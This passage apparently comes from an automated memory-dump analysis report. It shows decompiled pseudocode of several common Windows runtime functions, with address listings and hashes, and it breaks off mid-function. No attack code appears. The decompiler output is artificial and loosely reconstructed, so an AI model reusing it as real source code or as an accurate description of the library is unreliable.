                                                C-Code - Quality: 39%
                                                			E0167B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x16d7b9c; // 0x0
				_t124 = L01604620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01629800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L016077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01629910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x16d7b9c; // 0x0
									_t92 = L01604620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01629910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E015EA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0167E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0167E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                0x0167b8d9
                                                0x0167b8e4
                                                0x00000000
                                                0x0167b8e6
                                                0x0167b8f3
                                                0x0167b8f5
                                                0x0167b8f5
                                                0x0167b8f8
                                                0x0167b920
                                                0x0167b924
                                                0x0167b936
                                                0x0167b939
                                                0x0167b93d
                                                0x0167b948
                                                0x0167b9a0
                                                0x0167b9a0
                                                0x0167b9a4
                                                0x0167b9bf
                                                0x0167b9c4
                                                0x0167b9c6
                                                0x0167b9cd
                                                0x0167b9d1
                                                0x0167bad4
                                                0x0167bad8
                                                0x0167bada
                                                0x0167badc
                                                0x0167badc
                                                0x0167badf
                                                0x0167bae0
                                                0x0167bae2
                                                0x0167bae4
                                                0x0167baec
                                                0x0167baee
                                                0x0167baf0
                                                0x0167baf0
                                                0x0167baec
                                                0x0167bafb
                                                0x0167bafc
                                                0x0167bafe
                                                0x0167bb01
                                                0x0167bb01
                                                0x00000000
                                                0x0167bb06
                                                0x0167b9d7
                                                0x0167b9db
                                                0x0167b9db
                                                0x0167b9de
                                                0x0167b9de
                                                0x0167b9e4
                                                0x0167b9e7
                                                0x0167b9ea
                                                0x0167b9ec
                                                0x0167b9ef
                                                0x0167b9f3
                                                0x0167ba1b
                                                0x0167ba1b
                                                0x0167ba23
                                                0x0167ba24
                                                0x0167ba27
                                                0x0167ba2a
                                                0x0167ba2b
                                                0x0167ba2e
                                                0x0167ba30
                                                0x0167ba37
                                                0x0167ba3f
                                                0x0167ba9c
                                                0x0167baa2
                                                0x0167bb13
                                                0x0167bb15
                                                0x0167baae
                                                0x0167baae
                                                0x0167bab3
                                                0x0167bab5
                                                0x0167baba
                                                0x0167bac8
                                                0x0167bac8
                                                0x0167baba
                                                0x0167bacd
                                                0x0167bacf
                                                0x00000000
                                                0x0167bacf
                                                0x0167bb1a
                                                0x00000000
                                                0x0167bb1c
                                                0x0167baa7
                                                0x0167bb11
                                                0x00000000
                                                0x0167bb11
                                                0x0167baa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0167ba41
                                                0x0167ba41
                                                0x0167ba41
                                                0x0167ba58
                                                0x0167ba5d
                                                0x0167ba62
                                                0x00000000
                                                0x00000000
                                                0x0167ba64
                                                0x0167ba67
                                                0x0167ba68
                                                0x0167ba69
                                                0x0167ba6c
                                                0x0167ba6f
                                                0x0167ba71
                                                0x0167ba78
                                                0x0167ba80
                                                0x00000000
                                                0x00000000
                                                0x0167ba90
                                                0x0167ba90
                                                0x0167ba97
                                                0x00000000
                                                0x0167ba97
                                                0x0167b9f5
                                                0x0167b9f7
                                                0x0167b9f7
                                                0x0167b9fa
                                                0x0167ba03
                                                0x0167ba07
                                                0x0167ba0c
                                                0x0167ba10
                                                0x0167ba17
                                                0x00000000
                                                0x0167b9f7
                                                0x0167b9a6
                                                0x0167b9a8
                                                0x0167b9af
                                                0x0167b9b3
                                                0x00000000
                                                0x00000000
                                                0x0167b9b9
                                                0x00000000
                                                0x0167b9b9
                                                0x0167b94d
                                                0x0167b98f
                                                0x0167b995
                                                0x0167b999
                                                0x0167b960
                                                0x0167b967
                                                0x0167b968
                                                0x0167b96a
                                                0x00000000
                                                0x0167b96a
                                                0x0167b99b
                                                0x0167b99e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0167b99e
                                                0x0167b951
                                                0x0167b954
                                                0x0167b95a
                                                0x0167b95e
                                                0x0167b972
                                                0x0167b979
                                                0x0167b97d
                                                0x0167b97f
                                                0x0167b980
                                                0x0167b982
                                                0x0167b984
                                                0x00000000
                                                0x0167b984
                                                0x00000000
                                                0x0167b926
                                                0x00000000
                                                0x0167b926

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca21612f024852cdf156e39840501c80e5f0f28ba624b8d1ac9d8409a3095830
                                                • Instruction ID: 6e7cd4ce32b740d7f1f1d9ffef6a71d9212489a6e5dc847afad1377d489b2445
                                                • Opcode Fuzzy Hash: ca21612f024852cdf156e39840501c80e5f0f28ba624b8d1ac9d8409a3095830
                                                • Instruction Fuzzy Hash: 3971F232240B02AFE732EF18CC44F66BBE6EF40724F25452CEA55972A1DB75E941CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E52A5, Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E015E52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E015FEEF0(0x16d79a0);
					_t104 =  *0x16d8210; // 0x1182c58
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E015FEB70(_t93, 0x16d79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01629890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E015FEEF0(0x16d79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E015FEB70(0, 0x16d79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1182c65
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0161F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E015FEEF0(0x16d79a0);
									__eflags =  *0x16d8210 - _t104; // 0x1182c58
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x16d8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01664888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E015FEB70(_t95, 0x16d79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016295D0();
											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016295D0();
											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E015FEB70(_t93, 0x16d79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016295D0();
										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016295D0();
										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0161F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                0x015e52a5
                                                0x015e52ad
                                                0x015e52b0
                                                0x015e52b3
                                                0x015e52b7
                                                0x015e52ba
                                                0x015e52bf
                                                0x015e52c4
                                                0x015e52cc
                                                0x00000000
                                                0x00000000
                                                0x015e52ce
                                                0x015e52d9
                                                0x015e52dd
                                                0x015e52e7
                                                0x015e52f7
                                                0x015e52f9
                                                0x015e52fd
                                                0x01640dcf
                                                0x01640dd5
                                                0x01640dd6
                                                0x01640dd7
                                                0x01640dd8
                                                0x01640dd9
                                                0x01640dde
                                                0x01640ddf
                                                0x01640de0
                                                0x01640de1
                                                0x01640de2
                                                0x01640de5
                                                0x01640dea
                                                0x01640dec
                                                0x01640f60
                                                0x01640f64
                                                0x01640f70
                                                0x01640f76
                                                0x01640f79
                                                0x01640f79
                                                0x00000000
                                                0x01640f64
                                                0x01640df2
                                                0x01640df7
                                                0x01640e04
                                                0x01640e0d
                                                0x01640e0d
                                                0x01640e10
                                                0x01640e1a
                                                0x01640e1c
                                                0x01640e4c
                                                0x01640e52
                                                0x01640e61
                                                0x01640e67
                                                0x01640e6b
                                                0x01640e70
                                                0x01640e76
                                                0x01640ed7
                                                0x01640edc
                                                0x01640ee0
                                                0x01640ee6
                                                0x01640eea
                                                0x01640eed
                                                0x01640ef0
                                                0x01640ef3
                                                0x01640ef6
                                                0x01640ef9
                                                0x01640efe
                                                0x01640f01
                                                0x01640f01
                                                0x01640f0b
                                                0x01640f12
                                                0x01640f16
                                                0x01640f18
                                                0x01640f1b
                                                0x01640f2c
                                                0x01640f31
                                                0x01640f31
                                                0x01640f35
                                                0x01640f39
                                                0x01640f3a
                                                0x01640f3c
                                                0x01640f3f
                                                0x01640f50
                                                0x01640f55
                                                0x01640f55
                                                0x01640f59
                                                0x015e52eb
                                                0x015e52f1
                                                0x015e52f1
                                                0x01640e7d
                                                0x01640e84
                                                0x01640e88
                                                0x01640e8a
                                                0x01640e8d
                                                0x01640e9e
                                                0x01640ea3
                                                0x01640ea3
                                                0x01640ea7
                                                0x01640eaf
                                                0x01640eb3
                                                0x01640eb9
                                                0x01640eb9
                                                0x01640ebc
                                                0x01640ecd
                                                0x01640ecd
                                                0x00000000
                                                0x01640eb3
                                                0x01640e21
                                                0x01640e2b
                                                0x01640e2f
                                                0x01640e30
                                                0x01640e3a
                                                0x01640e3f
                                                0x01640e41
                                                0x00000000
                                                0x00000000
                                                0x01640e47
                                                0x00000000
                                                0x01640e47
                                                0x01640df9
                                                0x01640dfe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01640dfe
                                                0x015e5303
                                                0x015e5307
                                                0x00000000
                                                0x015e5309
                                                0x00000000
                                                0x015e5309
                                                0x015e5307
                                                0x015e52e9
                                                0x015e52e9
                                                0x00000000
                                                0x015e52e9
                                                0x015e530e
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e69e828a3f9ef8e406e9ae83cfa268d299e1317515261b7fe763806783c747b
                                                • Instruction ID: e14fb744308e63c2949f53e1995cfbc08527af0526c4e0ec88031bf8d433127a
                                                • Opcode Fuzzy Hash: 2e69e828a3f9ef8e406e9ae83cfa268d299e1317515261b7fe763806783c747b
                                                • Instruction Fuzzy Hash: 6D51EC31605752ABD322DF28CC45B2BBBE5FF90714F14092EF6958B651EB70E804CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01612AE4, Relevance: .2, Instructions: 159COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E01612AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x16d8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x16d8208; // 0x16d8207
				_t8 = _t57 + 0x16d8208; // 0x16d8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x16d8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x16d821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x16d6d5c; // 0x7f690654
							_t72 =  *0x16d6d5c; // 0x7f690654
							_t75 =  *0x16d6d5c; // 0x7f690654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x16d6d5c; // 0x7f690654
							_t84 =  *0x16d6d5c; // 0x7f690654
							_t87 =  *0x16d6d5c; // 0x7f690654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0162F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                0x01612ae4
                                                0x01612aec
                                                0x01612aef
                                                0x01612af4
                                                0x01612af7
                                                0x01612afd
                                                0x01612b92
                                                0x01612b92
                                                0x01612b97
                                                0x01612b9c
                                                0x01612b9c
                                                0x01612b03
                                                0x01612b06
                                                0x01612b09
                                                0x01612b09
                                                0x01612b0f
                                                0x01612b15
                                                0x01612b15
                                                0x01612b1b
                                                0x01612b1e
                                                0x01612b21
                                                0x01612b26
                                                0x01612b29
                                                0x01612b81
                                                0x01612b84
                                                0x01612c0e
                                                0x01612c15
                                                0x01612c24
                                                0x01612c24
                                                0x01612b8a
                                                0x01612b8a
                                                0x01612b8a
                                                0x01612b8a
                                                0x01612b90
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01612b4a
                                                0x01612b4a
                                                0x01612b4d
                                                0x01612b53
                                                0x00000000
                                                0x00000000
                                                0x01612b55
                                                0x01612b58
                                                0x01612bb7
                                                0x01655d1b
                                                0x01655d37
                                                0x01655d47
                                                0x01655d53
                                                0x01612bbd
                                                0x01612bbd
                                                0x01612bbd
                                                0x01612bb7
                                                0x01612b5d
                                                0x01612c2f
                                                0x01655d5b
                                                0x01655d77
                                                0x01655d87
                                                0x01655d93
                                                0x01612c35
                                                0x01612c35
                                                0x01612c35
                                                0x01612c2f
                                                0x01612b65
                                                0x01612b9f
                                                0x01612ba2
                                                0x01612b67
                                                0x01612b67
                                                0x01612b69
                                                0x01612b6b
                                                0x01612b6e
                                                0x01612bc9
                                                0x01612bcc
                                                0x01612bcf
                                                0x01612bd4
                                                0x01612bd6
                                                0x01612bd6
                                                0x01612bdb
                                                0x01612c02
                                                0x01612c05
                                                0x01612c07
                                                0x00000000
                                                0x01612c07
                                                0x01612be0
                                                0x01612c00
                                                0x01612c3f
                                                0x01612c3f
                                                0x00000000
                                                0x01612c00
                                                0x01612be5
                                                0x01612be7
                                                0x01612bec
                                                0x01612bf4
                                                0x01612bf6
                                                0x00000000
                                                0x01612bf6
                                                0x01612b70
                                                0x01612b76
                                                0x01612b2b
                                                0x01612b2b
                                                0x01612b2d
                                                0x01612b2f
                                                0x01612b32
                                                0x01612b35
                                                0x01612b3a
                                                0x00000000
                                                0x01612b40
                                                0x01612b43
                                                0x01612b45
                                                0x01612b47
                                                0x01612b4a
                                                0x01612b4d
                                                0x01612b53
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01612b53
                                                0x01612b78
                                                0x01612b78
                                                0x01612b7b
                                                0x01612b7e
                                                0x00000000
                                                0x01612b7e
                                                0x01612b76
                                                0x01612ba5
                                                0x01612ba5
                                                0x01612ba8
                                                0x01612bad
                                                0x00000000
                                                0x00000000
                                                0x01612baf
                                                0x01612baf
                                                0x01612bc2
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1fe711d1c588fc99447310775210fa6e9f0e317eb9964f9408cde514e9bf442
                                                • Instruction ID: 4ea727960c9918af27c7671bdb5680bacd1cca9c71c4897199a77ade199aeb8d
                                                • Opcode Fuzzy Hash: e1fe711d1c588fc99447310775210fa6e9f0e317eb9964f9408cde514e9bf442
                                                • Instruction Fuzzy Hash: 0C51A376E001158FCB18CF1DCCA49BDB7B1FB88704729855EE8469B369D734AA51CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0160DBE9, Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0160DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E015ECC50(E015E4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01607D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E016B8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01602280(_t58, _v44);
						E0160DD82(_v44, _t102, _t98);
						E0160B944(_t102, _v5);
						return E015FFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x16d8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x16d862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
